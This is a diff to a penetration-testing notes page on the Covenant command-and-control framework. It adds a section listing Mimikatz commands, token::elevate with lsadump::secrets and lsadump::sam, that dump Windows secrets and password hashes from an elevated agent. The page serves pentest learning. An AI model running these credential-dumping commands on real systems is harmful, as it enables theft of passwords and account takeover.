CSbyGB/pentips/Tools/covenant.md

   - Verify the kill date of the launcher
   - the UI may not allow changing the date.
 This can be fixed by deleting the `/opt/Covenant/Covenant/data/covenant.db` file and restarting the service.
 You will lose all data and need to create a new user to log in with.

+## Dump hashes with mimikatz

+- In a high grunt
+- We can use this to see if any plaintext info might come out `Mimikatz token::elevate lsadump::secrets`
+- Will dump the sam file (where password hashes are stored in windows)`Mimikatz token::elevate lsadump::sam`
+- Covenant will save tge Crendentials in the Data section as well

 ## Resources

 {% embed url="https://github.com/cobbr/Covenant" %} Get Covenant here {% endembed %}